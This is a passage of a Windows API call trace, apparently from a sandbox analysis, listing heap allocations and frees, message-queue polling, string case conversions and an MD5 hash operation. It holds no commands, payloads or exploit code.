[0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.291] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.291] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.291] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.291] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.292] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.292] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.292] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.293] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.293] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.293] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.293] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.293] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0161.293] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.294] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0161.294] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.294] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0161.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.295] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0161.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.295] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.296] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.296] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.297] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.297] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.297] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.298] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.298] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.298] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.298] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0161.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0161.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.299] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0161.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0161.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0161.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0161.303] RtlAllocateHeap 